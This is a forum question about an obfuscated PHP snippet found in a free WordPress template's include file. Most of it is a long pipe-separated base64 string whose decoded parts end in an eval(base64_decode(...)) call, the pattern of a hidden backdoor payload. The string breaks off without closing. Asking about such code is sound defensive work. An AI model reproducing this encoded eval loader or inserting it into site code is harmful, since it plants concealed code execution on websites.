# PHP code obfuscation in WordPress template

Tags: php, obfuscation

I downloaded a free web design template and while perusing the include files I found the following in a php include for template.php ...  this appears to be an attempt to encode something?  I tried to decode the $m variable that looks encoded but it decodes as junk...what is this?

```
$m="J|H|Z|f|O|H|B|Z|e|k|s|4|N|V|J|V|V|z|I|9|I|k|p|I|W|m|Z|N|b|l|o|x|V|E|h|B|e|E|9|I|a|z|B|W|M|U|U|5|S|W|x|w|d|V|Z|u|V|l|p|N|M|U|p|3|W|W|p|J|M|F|o|y|U|n|N|P|V|3|h|q|Z|W|1|S|M|V|l|V|U|k|t|O|b|F|p|V|U|W|p|O|V|V|U|y|Z|H|J|a|R|3|c|1|W|V|Z|a|d|G|F|I|S|k|5|N|V|m|t|5|W|T|J|0|M|F|d|W|W|j|V|i|R|G|R|L|U|0|Z|w|b|V|Z|X|M|U|d|X|R|l|J|z|U|2|0|5|a|F|Y|z|Q|l|Z|U|b|T|E|z|T|1|U|x|R|W|R|E|T|m|h|S|M|n|h|6|V|2|x|O|b|m|V|F|d|F|l|k|S|E|J|h|Y|V|d|k|c|l|p|H|d|z|V|Z|V|l|p|0|Y|U|h|K|T|k|1|W|a|3|l|Z|M|n|Q|w|V|1|Z|Z|e|G|M|y|d|G|t|i|R|G|x|U|V|1|Z|a|a|1|Q|x|V|n|R|h|S|E|J|o|Y|k|Z|F|e|V|l|r|W|X|d|P|V|k|J|Y|T|l|R|G|a|V|I|z|Z|H|d|X|V|z|V|L|Y|k|Z|s|W|G|N|6|Z|E|x|l|W|E|5|y|W|k|d|3|N|V|U|x|b|F|d|a|R|T|l|W|Y|l|d|o|d|1|l|X|e|F|J|N|b|U|p|F|Z|E|R|s|a|m|J|W|W|X|d|a|R|m|h|L|Z|F|V|w|S|V|d|t|W|l|Z|i|V|V|p|Z|V|k|d|4|S|2|I|y|R|l|h|j|R|l|Z|P|Y|l|h|j|M|1|p|s|R|T|l|Q|U|0|k|3|W|l|h|a|a|G|J|D|a|G|l|Z|W|E|5|s|T|m|p|S|Z|l|p|H|V|m|p|i|M|l|J|s|S|0|N|S|M|l|h|6|S|j|J|k|V|X|h|3|T|V|R|o|N|U|5|G|Z|F|J|L|U|2|s|3|W|m|5|W|d|V|k|z|U|n|B|i|M|j|R|n|Z|G|w|5|M|1|d|U|Z|D|V|Z|M|n|h|Y|V|T|B|4|d|0|5|5|Z|2|t|k|b|D|l|C|V|m|p|R|e|l|l|t|S|X|h|O|M|m|x|T|W|W|l|3|a|2|R|s|O|T|N|i|R|l|I|z|Y|W|p|O|M|l|F|u|R|T|R|h|U|2|w|3|W|l|d|O|b|2|J|5|Q|W|l|J|a|n|N|r|Z|G|w|5|e|V|l|W|Q|n|V|j|b|k|J|s|Y|l|d|G|V|W|J|6|M|G|l|J|a|n|N|r|Z|G|w|5|b|F|Y|y|S|n|V|O|V|3|R|T|Z|F|V|z|N|E|1|q|M|G|9|k|b|D|l|s|Y|3|p|k|d|W|F|E|S|j|Z|W|V|E|I|z|V|F|N|n|a|2|R|s|O|T|N|i|R|l|I|z|Y|W|p|O|M|l|F|u|R|T|R|h|U|2|t|2|T|W|l|r|N|1|p|t|O|X|l|L|Q|1|I|y|W|D|J|k|a|1|p|t|M|D|J|N|M|k|p|u|V|V|Z|j|M|l|B|U|Q|T|d|K|S|F|p|m|W|j|J|S|b|W|J|U|W|X|p|Z|b|W|R|S|V|n|p|Z|O|E|p|I|W|m|Z|a|V|m|R|p|Y|m|p|W|c|l|V|u|V|k|x|P|R|E|k|3|S|3|l|z|a|2|R|s|O|W|5|a|R|1|p|0|T|m|p|O|a|V|o|x|R|l|h|O|a|W|w|3|S|k|h|a|Z|m|N|t|R|l|F|i|b|k|p|3|W|l|c|x|a|F|Z|H|O|H|V|Q|V|0|5|v|Y|2|l|o|b|1|p|Y|a|G|t|a|V|0|1|v|Y|z|N|W|a|W|M|z|U|n|l|L|Q|1|I|y|W|D|N|k|c|1|Z|I|Z|H|F|N|M|1|p|D|Y|1|R|o|c|E|x|D|U|j|J|Y|M|m|R|r|W|m|0|w|M|k|0|y|S|m|5|V|V|m|M|y|S|2|p|J|c|0|1|p|a|3|B|L|V|H|Q|5|S|k|h|a|Z|k|1|s|c|F|N|j|V|m|w|0|W|l|R|C|N|G|V|t|b|z|l|J|a|U|k|3|S|k|h|a|Z|l|p|W|Z|G|l|i|a|l|Z|y|V|W|5|W|T|E|9|E|S|T|l|k|b|D|l|s|Y|3|p|k|d|W|F|E|S|j|Z|W|V|E|I|z|V|F|N|n|a|2|R|s|O|X|l|Z|V|k|J|1|Y|2|5|C|b|G|J|X|R|l|V|i|e|W|s|3|S|k|h|a|Z|l|U|y|S|X|p|V|V|2|x|M|T|V|d|k|b|1|Z|Y|R|T|l|k|b|D|l|s|Y|3|p|k|d|W|F|E|S|j|Z|W|V|E|I|z|V|F|N|n|a|2|R|s|O|U|J|W|a|l|F|6|W|W|1|J|e|E|4|y|b|F|N|Z|a|W|s|3|W|m|0|5|e|U|t|D|U|j|J|Y|M|m|R|r|W|m|0|w|M|k|0|y|S|m|5|V|V|m|M|y|U|F|R|B|N|0|p|I|W|m|Z|a|M|l|J|t|Y|l|R|Z|e|l|l|t|Z|F|J|W|e|l|k|4|S|k|h|a|Z|l|p|W|Z|G|l|i|a|l|Z|y|V|W|5|W|T|E|9|E|S|T|d|L|e|X|N|r|Z|G|w|5|b|l|p|H|W|n|R|O|a|k|5|p|W|j|F|G|W|E|5|p|b|D|d|K|S|F|p|m|V|U|d|4|b|1|F|s|T|T|B|W|b|l|Z|4|W|m|5|n|O|W|M|z|V|m|l|j|M|1|J|5|S|0|N|S|M|l|g|z|S|m|h|V|R|z|V|5|Y|0|d|W|d|F|l|W|U|n|Z|M|Q|1|I|y|W|D|J|k|a|1|p|t|M|D|J|N|M|k|p|u|V|V|Z|j|M|k|x|E|R|X|B|P|e|V|I|y|W|D|I|1|N|V|Q|y|b|z|N|W|W|E|Z|2|V|E|R|j|M|l|B|Y|T|j|F|Z|b|k|4|w|Y|2|l|n|a|2|R|s|O|U|J|W|a|l|F|6|W|W|1|J|e|E|4|y|b|F|N|Z|a|X|d|r|Z|G|w|5|b|l|p|H|W|n|R|O|a|k|5|p|W|j|F|G|W|E|5|p|V|W|t|k|b|D|l|U|W|W|p|O|U|m|F|V|c|3|h|a|M|m|h|W|Y|1|N|3|e|E|t|U|c|2|t|k|b|D|l|2|W|j|N|o|d|U|1|X|Z|G|F|R|V|k|Z|Q|V|m|o|x|d|m|N|t|U|W|9|K|S|F|p|m|V|U|d|4|b|1|F|s|T|T|B|W|b|l|Z|4|W|m|5|n|c|E|9|5|U|j|J|Y|e|l|Z|R|T|U|d|0|M|1|Y|z|a|H|h|j|M|n|h|R|U|F|c|5|e|V|p|D|Z|2|t|k|b|D|l|1|Z|V|U|5|c|U|4|x|V|n|h|i|M|H|c|z|T|m|l|r|N|0|p|I|W|m|Z|h|M|3|B|q|Z|W|p|W|a|U|1|H|O|T|Z|k|a|z|A|5|S|k|h|a|Z|m|I|y|Z|D|R|i|a|k|Z|u|V|2|t|G|U|l|Q|x|W|X|R|K|S|F|p|m|T|l|Z|B|d|2|E|z|Z|F|h|l|S|E|Z|6|Y|k|Z|B|N|0|p|I|W|m|Z|V|R|3|h|v|U|W|x|N|M|F|Z|u|V|n|h|a|b|m|c|5|W|T|J|o|e|U|t|D|U|j|J|Y|M|n|Q|2|W|T|N|v|M|V|l|q|Q|n|Z|l|b|l|p|O|S|1|R|z|a|2|R|s|O|H|l|X|b|E|p|4|V|1|h|o|b|E|1|I|a|D|Z|h|a|T|Q|5|S|k|h|a|Z|l|V|H|e|G|9|R|b|E|0|w|V|m|5|W|e|F|p|u|Z|z|d|m|W|E|p|s|Z|E|h|W|e|W|J|p|U|j|J|Y|e|k|p|h|V|W|5|G|W|m|V|H|V|X|d|l|S|H|B|x|T|z|M|w|P|S|I|7|Z|X|Z|h|b|C|h|i|Y|X|N|l|N|j|R|f|Z|G|V|j|b|2|R|l|K|C|R|2|X|z|h|w|W|X|p|L|O|D|V|S|V|V|c|y|K|S|k|7|J|H|Z|f|Z|V|d|i|b|j|V|r|U|n|V|L|O|D|I|9|I|m|M|3|M|n|E|w|b|T|c|x|V|1|R|U|M|W|h|x|W|l|V|V|W|m|R|6|T|D|J|W|Q|T|Z|o|d|l|p|O|b|W|h|m|I|j|s|k|d|l|9|0|Z|H|I|3|U|j|d|z|U|W|4|5|V|T|0|i|Q|z|l|B|Q|0|E|w|R|D|R|B|N|E|Q|2|Q|T|Y|5|R|j|c|3|Q|z|h|D|N|D|k|w|R|D|B|E|N|k|J|C|Q|j|l|C|Q|U|N|D|O|E|N|B|M|0|M|3|M|0|M|1|R|k|E|2|O|T|l|E|M|E|U|1|N|0|E|3|N|U|E|5|R|E|J|E|Q|U|R|D|Q|T|M|5|N|z|k|x|Q|T|R|F|N|k|E|3|O|T|Y|5|N|D|c|2|Q|z|g|5|N|k|U|w|R|T|U|4|O|U|I|4|Q|z|h|D|R|D|g|2|Q|j|g|3|M|z|Z|E|N|j|A|0|Q|T|l|C|Q|0|J|E|R|U|M|5|N|k|U|5|N|D|h|C|Q|z|l|E|M|k|E|1|Q|T|Z|E|N|j|l|F|R|T|F|C|M|j|k|3|Q|z|N|D|M|0|I|1|Q|T|V|B|M|k|U|z|Q|z|N|C|Q|0|J|E|Q|0|U|5|R|k|Y|3|N|k|Z|B|N|U|J|G|Q|T|U|5|Q|k|N|B|R|D|d|D|Q|z|d|B|O|T|B|E|N|U|N|C|R|D|F|B|Q|z|U|y|R|E|Q|5|O|U|U|4|O|U|Q|5|R|E|M|2|Q|j|V|D|O|D|Z|C|R|D|R|E|N|k|M|w|Q|z|k|5|M|E|Q|3|O|E|J|C|N|T|U|2|M|0|J|C|Q|k|E|0|O|U|V|E|N|z|k|2|O|D|E|4|Q|T|l|D|R|E|J|E|Q|U|R|D|Q|T|M|5|N|0|F|G|N|T|d|B|O|D|Q|x|Q|U|U|2|M|U|I|1|Q|j|g|5|N|U|M|3|R|D|J|C|R|E|M|5|Q|k|V|D|O|U|Q|y|Q|T|I|3|M|0|E|5|Q|z|Z|B|M|D|l|F|Q|0|R|E|N|0|J|F|N|z|U|5|O|T|g|4|O|E|R|E|N|0|E|3|O|T|F|E|O|T|k|1|Q|0|U|5|Q|j|k|2|Q|z|k|3|Q|j|d|E|N|k|M|3|M|k|E|w|O|D|Q|3|R|j|d|G|O|D|Q|4|R|U|E|0|N|z|Y|1|Q|z|g|w|N|k|I|2|M|D|k|y|Q|T|A|4|N|D|c|4|O|T|c|5|M|j|k|w|O|E|Q|2|M|T|V|D|O|U|I|1|Q|T|k|3|N|j|E|1|Q|j|g|x|N|0|U|3|R|T|V|C|O|T|I|5|Q|j|g|0|N|0|Y|3|R|j|g|0|O|E|V|B|N|D|c|2|N|U|M|4|M|D|Z|C|N|j|A|5|M|k|E|w|O|D|Q|3|O|D|k|3|O|T|I|5|M|D|h|E|N|j|E|1|Q|z|l|C|N|U|E|5|N|z|Y|x|N|U|I|4|M|T|d|F|N|0|U|1|Q|j|k|y|O|U|I|4|N|D|d|G|N|0|Y|4|N|D|h|F|Q|T|Q|3|N|j|V|D|O|D|A|2|Q|j|Y|w|O|T|J|B|M|D|g|0|N|z|g|5|N|z|k|y|O|T|A|4|R|D|Y|x|N|U|M|5|Q|j|V|B|O|T|c|2|M|T|V|C|O|D|E|3|R|T|d|F|N|j|A|3|M|j|k|1|Q|0|V|D|N|U|I|0|Q|k|R|E|N|k|R|G|Q|j|A|5|Q|k|N|B|Q|T|A|5|Q|0|Q|3|R|T|V|D|R|U|I|z|R|E|Y|4|O|E|E|z|O|D|M|1|R|T|g|y|R|T|M|5|N|U|U|w|O|U|M|5|R|k|N|C|Q|j|l|C|O|D|U|x|Q|0|F|F|Q|T|d|B|O|T|F|C|N|j|d|B|Q|0|N|F|Q|0|I|x|O|T|g|5|M|z|Y|z|O|U|V|E|Q|0|V|B|Q|0|E|4|O|D|l|D|O|T|d|E|R|E|R|B|Q|U|U|2|M|E|U|1|O|T|h|E|M|k|E|0|O|T|Z|C|R|U|M|2|Q|j|U|5|N|U|N|E|O|U|Z|C|R|E|M|0|Q|z|I|4|O|T|g|2|O|U|F|D|M|D|k|z|Q|z|h|B|O|D|l|C|R|E|N|C|M|z|d|D|Q|U|R|D|R|k|Q|0|Q|z|d|E|M|U|E|y|N|T|R|B|R|j|g|3|R|E|N|B|O|T|k|1|Q|z|d|D|N|k|I|5|Q|T|R|E|Q|j|k|x|Q|U|V|C|R|E|J|B|Q|z|d|D|O|U|V|E|O|D|g|2|M|U|I|3|N|0|Y|2|M|j|g|4|Q|j|J|C|Q|j|Z|F|R|D|V|E|Q|U|N|C|Q|z|k|3|N|D|U|0|R|D|l|B|N|E|U|x|Q|T|c|2|Q|j|g|2|O|D|N|D|Q|k|E|4|R|E|Y|5|R|k|J|F|Q|0|U|4|M|0|M|3|R|E|R|B|O|T|Z|F|N|T|J|D|Q|U|E|y|Q|T|h|D|R|k|R|C|Q|0|U|4|Q|j|h|G|Q|z|d|D|O|E|N|G|O|T|h|B|M|E|R|D|N|T|J|B|Q|j|c|4|Q|T|R|D|M|E|I|1|N|z|Q|3|N|U|N|E|R|D|V|D|M|0|I|4|Q|j|Z|D|R|U|M|5|R|E|U|2|Q|z|g|1|Q|k|J|C|M|0|F|D|Q|0|R|F|O|D|k|2|N|0|R|D|R|U|E|2|O|T|I|4|M|z|c|z|O|T|M|5|M|T|k|4|R|E|Y|5|Q|z|k|3|O|T|Q|3|N|k|J|D|Q|T|V|E|Q|0|U|x|O|T|Q|4|N|D|g|0|R|D|F|E|Q|k|Y|x|N|0|F|B|N|U|J|C|Q|j|N|B|Q|0|N|E|R|T|h|D|Q|U|J|E|R|D|Z|E|N|k|R|B|O|T|E|5|Q|U|E|x|R|E|U|1|R|j|h|G|N|T|d|B|N|U|I|4|Q|z|Z|C|Q|j|k|2|R|E|N|B|R|T|d|D|Q|j|R|C|N|0|M|2|Q|z|V|F|O|E|I|3|N|T|Q|5|N|D|g|1|O|U|J|D|Q|0|R|G|Q|k|R|B|R|k|U|x|Q|0|R|D|Q|T|g|z|N|0|Z|B|M|U|U|0|Q|T|R|E|N|k|E|1|O|T|g|5|M|z|g|z|Q|j|U|2|R|j|h|G|Q|U|M|2|N|D|c|5|Q|z|l|D|Q|U|M|z|R|E|R|C|R|T|k|3|Q|k|F|B|Q|U|F|B|Q|z|d|E|Q|0|M|5|Q|k|R|F|M|U|N|E|R|D|h|D|M|j|d|G|Q|T|F|E|R|T|k|1|Q|k|N|B|N|T|l|E|R|D|A|5|M|T|l|B|N|z|J|C|N|E|M|0|O|U|Y|5|M|D|c|1|O|D|k|4|R|T|l|B|O|T|I|3|M|0|E|y|O|T|Q|3|Q|j|g|4|R|T|V|D|Q|z|Z|F|Q|z|F|C|Q|U|J|C|Q|T|g|1|N|z|Z|D|O|T|E|4|N|E|J|G|O|E|M|3|N|j|c|3|Q|0|J|C|R|D|l|E|R|D|Q|5|M|U|N|E|Q|k|R|D|N|E|Q|x|O|D|R|F|O|U|J|B|O|U|V|D|R|j|Y|x|O|U|V|E|N|0|U|z|Q|k|Y|3|R|E|Q|z|R|E|F|E|N|U|Q|x|Q|U|I|1|M|k|U|x|O|T|F|E|N|D|l|D|N|T|E|3|R|j|c|0|Q|k|Q|5|R|k|N|C|R|E|R|D|R|k|I|5|Q|k|E|3|Q|U|Q|0|R|E|J|C|M|z|k|3|N|z|Y|3|M|z|Y|y|O|U|J|B|M|j|h|F|N|0|M|5|Q|j|k|2|O|D|Y|4|Q|z|c|y|N|T|J|C|N|z|c|x|Q|j|k|4|Q|T|c|2|N|z|d|D|N|0|J|D|Q|T|B|E|R|j|k|x|Q|z|l|D|M|z|c|1|Q|k|Z|E|Q|U|R|G|Q|k|V|B|Q|j|c|2|Q|j|E|5|N|0|N|G|R|E|J|D|R|D|Z|F|O|T|c|5|N|z|c|w|N|k|Q|2|N|j|V|D|O|T|E|z|Q|U|M|x|O|U|N|B|O|U|N|C|O|E|U|3|N|D|Z|E|R|D|R|E|Q|T|k|4|O|T|F|C|R|D|h|F|Q|T|J|D|R|U|I|0|O|T|d|D|M|0|E|2|N|T|Z|B|Q|k|U|4|Q|k|Z|C|M|k|Q|2|R|E|N|B|M|j|k|y|O|U|Y|2|N|k|F|G|N|k|N|E|M|U|E|w|Q|T|c|3|N|0|I|3|Q|z|A|5|M|k|R|C|R|T|Q|5|N|z|c|3|Q|z|l|C|R|k|R|D|R|U|V|D|M|z|l|C|Q|k|F|B|O|D|l|C|R|E|M|5|O|D|k|4|N|k|V|E|M|E|Q|3|R|D|R|E|N|z|l|D|Q|T|B|F|N|T|U|w|Q|T|k|2|N|j|k|1|Q|z|B|D|Q|T|k|y|N|k|Q|5|N|0|R|E|Q|z|M|5|M|z|V|G|Q|T|Z|D|R|E|V|E|Q|z|A|2|Q|z|c|2|N|0|R|B|M|k|Q|x|Q|j|Q|5|N|k|I|2|Q|T|F|B|N|k|J|B|Q|0|I|5|Q|z|l|G|R|D|Y|1|M|E|I|w|Q|T|k|5|N|k|J|C|Q|k|R|D|O|D|Z|E|O|T|d|E|O|T|h|F|O|T|M|5|M|U|N|G|R|D|B|C|O|D|Z|D|O|U|V|C|R|k|I|0|Q|U|E|4|O|E|V|E|Q|z|N|D|M|k|Q|1|O|D|h|E|M|k|N|D|N|T|c|2|R|U|E|w|Q|T|V|E|O|T|c|1|N|k|Q|4|N|k|M|w|Q|k|Q|2|R|j|c|y|R|E|V|D|M|0|N|E|N|z|U|5|N|D|g|0|Q|j|Z|C|O|D|l|C|O|T|Q|3|R|D|l|F|O|U|N|C|N|E|F|F|Q|j|Z|E|M|k|Q|1|Q|0|I|4|M|z|d|B|Q|T|R|E|N|j|k|0|R|D|Z|B|Q|j|Z|E|O|D|Z|C|Q|z|g|4|N|k|Z|B|N|E|U|2|Q|z|Y|5|M|z|c|1|Q|z|Z|D|R|E|V|E|Q|z|A|1|M|k|N|E|Q|U|F|B|Q|U|Q|w|O|T|Z|D|N|k|I|3|O|E|R|B|N|D|k|1|R|D|h|B|M|z|c|w|Q|U|Q|5|N|E|Q|2|Q|U|Q|1|M|U|J|B|Q|z|B|C|N|U|E|0|R|E|J|B|R|T|d|D|Q|z|l|C|Q|U|Q|y|R|D|h|G|M|U|I|1|O|T|Z|C|R|E|E|2|Q|U|E|4|Q|U|I|0|N|0|F|C|M|U|R|D|R|D|Z|E|Q|U|M|4|Q|T|V|B|N|j|k|x|N|k|M|5|Q|z|l|C|O|U|F|D|R|D|k|y|O|T|A|2|M|E|Q|0|R|E|E|5|O|D|V|G|N|z|l|D|R|U|Q|0|R|D|l|B|R|k|E|0|Q|k|J|B|N|T|l|G|R|E|N|E|N|U|N|E|Q|j|B|D|Q|0|Q|w|R|D|V|E|M|D|l|D|N|T|I|5|M|T|k|x|R|E|I|5|Q|j|U|x|N|0|J|D|O|E|M|0|O|T|B|D|Q|k|U|z|Q|k|Z|C|O|U|J|F|Q|0|V|D|M|0|V|E|Q|U|U|5|M|U|J|G|Q|U|Z|B|N|E|N|E|R|T|g|3|Q|T|g|4|O|E|R|E|R|k|Q|1|R|D|E|1|R|U|E|2|O|T|F|B|M|0|Q|1|Q|T|Z|B|O|D|c|3|Q|k|R|D|N|z|U|x|R|D|R|E|N|k|J|C|Q|0|J|C|Q|T|d|B|Q|z|Z|F|N|k|F|E|Q|T|B|D|M|T|Y|x|N|U|Q|4|R|j|g|w|O|D|Q|3|R|D|c|3|N|z|I|4|Q|U|Q|3|Q|T|c|5|M|U|Q|0|Q|T|J|E|M|j|l|C|O|U|F|D|Q|k|I|z|Q|z|c|5|M|0|M|3|R|D|l|D|O|U|M|y|Q|k|E|3|Q|T|g|0|Q|j|c|2|Q|z|U|5|O|T|J|B|R|D|l|G|Q|T|Z|C|M|k|M|y|O|D|J|B|Q|k|J|D|Q|0|V|D|O|E|E|0|O|T|c|5|M|T|c|z|R|E|Y|5|Q|z|k|1|Q|z|B|D|O|D|k|w|N|j|B|E|M|E|E|1|O|T|g|5|M|U|N|B|Q|z|Z|B|M|k|E|x|N|0|E|z|Q|z|d|E|N|0|R|B|M|k|Q|x|Q|j|Q|5|N|k|F|G|O|E|R|E|M|E|Q|4|Q|z|g|5|R|D|Z|G|O|T|M|5|O|E|U|x|Q|U|J|B|M|T|k|x|O|D|M|4|M|0|E|4|R|E|Z|F|O|D|g|4|Q|z|l|C|Q|U|M|3|R|D|R|F|N|k|F|E|Q|T|Z|C|Q|k|F|E|O|U|Z|E|Q|0|R|C|O|D|h|C|M|U|R|D|R|D|U|5|N|U|R|B|Q|T|Z|B|N|E|Q|1|Q|T|B|E|R|j|l|D|Q|T|R|D|Q|T|g|x|Q|0|I|5|N|k|N|B|O|U|V|D|M|k|M|0|Q|z|h|D|R|U|N|E|R|T|h|C|M|z|Y|x|N|z|g|2|M|U|F|B|Q|z|l|F|O|E|M|x|Q|j|N|F|M|U|E|1|O|D|h|D|M|j|k|5|O|U|V|E|M|j|l|F|R|D|g|1|O|T|Z|G|Q|U|V|D|M|0|M|2|O|T|V|E|O|E|U|z|Q|k|Z|D|O|E|M|4|N|0|F|B|Q|0|U|5|Q|k|Z|B|N|k|J|G|Q|U|Y|5|R|E|E|0|Q|T|V|C|Q|j|h|D|Q|T|k|5|N|0|Q|y|Q|0|M|3|N|T|U|5|O|U|Y|z|Q|T|k|0|N|z|M|5|R|E|M|w|O|T|I|5|M|D|k|y|O|D|h|E|O|U|N|D|Q|k|F|C|Q|j|k|3|O|D|Z|F|M|k|M|w|Q|T|Z|D|N|j|d|C|N|j|U|5|N|0|V|E|R|D|F|D|N|T|l|C|Q|z|l|E|N|k|Q|z|Q|U|E|2|N|k|U|z|O|T|V|E|Q|k|F|C|N|U|Z|C|Q|U|M|z|Q|z|E|2|M|E|R|C|R|D|l|C|Q|k|M|3|Q|k|F|D|Q|U|Q|z|R|T|N|C|Q|U|E|2|O|D|R|B|O|U|F|B|R|D|V|F|M|j|d|D|N|k|V|F|M|U|M|5|R|D|h|D|Q|T|l|D|Q|T|Z|B|R|T|U|y|Q|0|M|5|O|T|l|E|Q|j|h|D|M|k|J|G|N|T|N|B|N|k|M|4|Q|z|N|D|M|0|I|5|Q|z|l|E|Q|k|V|E|N|k|M|4|N|U|J|F|Q|T|J|B|O|E|N|E|Q|z|Z|D|O|U|I|3|R|E|J|E|Q|z|g|2|Q|j|Y|5|Q|0|E|0|R|T|c|5|O|U|Q|w|O|U|N|B|N|D|k|z|O|D|N|C|N|T|Z|G|Q|T|R|B|M|E|M|2|Q|k|U|5|M|z|g|x|O|T|I|4|N|D|c|z|N|k|U|4|N|U|I|2|Q|T|J|B|N|k|I|y|O|D|l|C|Q|U|Q|2|Q|T|Y|4|R|D|l|F|N|D|E|z|Q|z|k|1|Q|T|R|E|R|D|k|2|O|T|R|D|O|U|I|5|Q|j|g|5|Q|U|R|D|R|D|B|D|R|E|I|3|Q|j|R|D|M|0|Q|y|R|T|h|C|M|U|E|0|N|z|Y|3|R|T|U|2|O|E|Z|C|M|k|M|2|Q|j|d|B|Q|k|E|0|Q|0|U|5|N|z|c|1|O|D|Z|E|O|T|k|1|R|E|E|5|Q|z|U|x|O|U|F|D|N|k|I|5|O|T|V|E|M|U|U|1|O|T|Y|4|N|E|J|E|O|E|V|B|M|k|I|2|Q|z|E|5|R|T|k|0|N|j|g|2|N|D|c|y|O|U|Q|5|N|k|J|B|R|D|Z|B|N|k|E|y|Q|z|Q|1|N|z|l|B|R|T|M|5|N|U|Q|z|N|z|Q|1|M|0|J|G|Q|z|h|D|O|E|E|x|Q|T|J|B|M|D|g|5|Q|0|N|D|Q|0|Q|x|O|T|J|E|Q|k|J|D|Q|T|J|D|O|T|c|1|Q|T|h|D|R|E|U|0|Q|0|U|3|Q|0|Q|w|R|D|d|E|M|z|k|y|Q|U|E|5|Q|U|Q|y|Q|T|J|E|M|k|E|3|Q|T|B|D|M|E|M|y|Q|z|g|1|R|k|Q|w|R|T|V|D|N|0|M|x|N|z|c|3|Q|U|Q|4|R|E|J|C|R|T|k|5|Q|k|J|C|N|T|c|z|O|E|F|E|N|U|J|D|Q|k|F|D|R|U|Q|2|R|D|E|4|N|T|c|1|O|D|l|E|Q|T|l|F|R|D|F|B|N|k|E|4|Q|0|E|3|N|E|E|3|O|T|l|D|O|U|U|z|Q|k|Z|B|N|U|M|0|Q|z|N|E|M|k|V|F|N|k|M|4|N|U|J|C|Q|j|N|B|Q|0|Q|x|R|D|l|C|R|k|M|x|Q|T|k|5|N|0|M|3|Q|T|E|3|M|z|Y|x|R|E|Q|5|O|U|F|C|N|U|U|1|R|j|Y|x|N|0|I|5|M|D|Y|w|R|E|R|E|R|D|k|4|O|T|E|4|N|E|M|2|Q|0|R|C|O|D|c|z|N|k|Q|2|M|D|R|C|N|j|U|5|M|k|E|w|O|D|Q|3|O|D|k|3|O|T|I|5|M|D|h|E|N|j|E|1|Q|z|l|C|N|U|E|5|N|z|Y|x|N|U|I|4|M|T|d|F|N|0|U|1|Q|j|k|y|O|U|I|4|N|D|d|G|N|0|Y|4|N|D|h|F|Q|T|Q|3|N|j|V|D|O|D|A|2|Q|j|Y|w|O|T|J|B|M|D|g|0|N|z|g|5|N|z|k|y|O|T|A|4|R|D|Y|x|N|U|M|5|Q|j|V|B|O|T|c|2|M|T|V|C|O|D|E|3|R|T|d|F|N|U|I|5|M|j|l|C|O|D|Q|3|R|j|d|G|O|D|Q|4|R|U|E|0|N|z|Y|1|Q|z|g|w|N|k|I|2|M|D|k|y|Q|T|A|4|N|D|c|4|O|T|c|5|M|j|k|w|O|E|Q|2|M|T|V|D|O|U|I|1|Q|T|k|3|N|j|E|1|Q|j|g|x|N|0|U|3|R|T|V|C|O|T|I|5|Q|j|g|0|N|0|Y|3|R|j|g|0|O|E|V|B|N|D|c|2|N|U|M|4|N|T|R|C|O|U|N|E|R|E|U|0|Q|k|R|D|M|k|Q|2|R|D|d|E|N|D|g|z|Q|U|I|5|Q|U|Q|2|O|U|R|E|M|j|k|2|O|T|R|D|O|U|I|5|Q|j|g|5|Q|U|R|D|O|T|k|4|M|0|Q|w|N|U|Y|2|M|0|F|C|R|T|Z|C|Q|j|k|0|Q|j|d|B|R|D|U|2|O|E|N|F|Q|U|N|B|Q|j|d|E|Q|k|N|F|R|D|U|4|R|j|V|C|Q|T|Z|F|M|T|h|G|R|D|B|B|O|T|k|2|Q|k|J|C|R|E|M|4|O|T|B|D|R|U|U|w|Q|z|l|D|O|U|J|B|Q|0|M|5|M|D|l|F|Q|z|B|B|M|k|I|1|Q|T|R|B|O|E|N|E|R|E|F|D|M|0|M|y|Q|0|N|E|Q|k|M|4|Q|z|I|5|R|k|E|x|R|E|U|5|N|T|k|5|N|U|J|B|N|U|M|3|Q|j|N|C|N|0|E|z|Q|0|R|E|N|U|M|z|Q|z|l|C|N|E|N|E|Q|z|Z|E|O|U|I|1|Q|T|B|D|N|E|E|2|Q|T|g|5|N|D|l|B|Q|0|V|C|R|U|N|D|Q|0|J|E|O|E|M|4|O|U|I|5|Q|k|U|1|O|E|Z|E|M|0|E|2|Q|T|B|D|Q|k|I|5|Q|z|Y|5|M|E|I|w|R|T|B|D|N|0|J|B|Q|T|R|D|O|E|Q|w|R|j|M|4|N|z|N|D|N|U|Y|2|N|T|k|5|R|E|R|F|O|E|N|D|Q|j|N|E|Q|k|R|D|Q|T|N|D|Q|T|l|D|Q|T|Z|E|M|D|l|G|R|E|R|B|Q|j|l|B|Q|z|Z|D|M|j|d|D|N|T|h|E|Q|0|Q|2|Q|z|d|D|N|U|M|x|Q|k|J|E|O|E|R|G|Q|j|g|5|Q|k|N|B|Q|T|Y|5|N|U|Q|0|R|E|Z|D|O|E|I|5|R|T|A|4|R|j|h|G|O|U|U|0|M|T|N|C|O|T|U|5|O|E|N|F|Q|U|E|5|O|T|k|0|N|0|I|4|Q|T|Z|C|O|T|l|B|M|T|h|B|O|E|U|4|N|j|k|x|O|E|J|C|N|T|U|2|M|0|I|3|Q|U|I|x|Q|T|V|E|Q|k|V|B|Q|j|l|D|N|E|N|F|R|E|F|D|R|k|M|0|O|T|k|5|R|U|Q|2|Q|T|M|4|R|D|c|0|N|T|F|C|O|E|M|2|Q|z|Y|5|M|k|U|x|O|T|k|2|N|D|V|F|N|U|U|4|M|U|M|2|R|T|Z|C|Q|j|k|5|Q|j|V|B|O|U|E|1|R|D|V|E|Q|j|g|x|O|E|J|B|Q|k|N|G|Q|0|J|E|N|z|k|2|O|T|R|E|R|D|l|G|R|D|R|B|M|D|l|G|Q|k|R|D|M|z|d|D|N|T|h|E|R|k|U|x|Q|0|Z|D|N|0|M|x|O|D|E|4|R|E|E|2|N|T|Y|z|Q|j|V|G|N|j|g|5|O|E|Q|0|R|T|V|D|M|U|F|E|R|T|F|E|M|U|R|B|Q|0|Y|5|Q|z|U|5|Q|U|U|2|R|U|Q|0|O|U|N|B|N|U|I|2|Q|j|Z|D|M|E|E|w|Q|0|Z|E|Q|U|M|4|Q|k|J|D|N|D|g|y|O|E|J|F|O|E|F|E|O|U|Z|C|Q|j|Y|4|N|U|Y|5|N|D|g|w|N|j|M|1|N|z|k|0|R|E|N|D|R|U|M|4|Q|T|Q|5|N|0|Q|w|Q|T|N|F|M|U|I|w|O|U|R|C|Q|z|d|C|O|T|E|2|R|j|h|D|R|T|V|D|Q|U|J|F|Q|z|N|D|M|E|Q|z|R|D|U|3|M|E|E|2|Q|z|Z|B|Q|U|E|0|Q|0|V|F|N|U|I|1|N|z|V|F|M|U|N|B|Q|z|V|E|M|0|E|5|O|T|d|E|N|z|k|5|R|T|U|1|R|T|h|F|O|D|U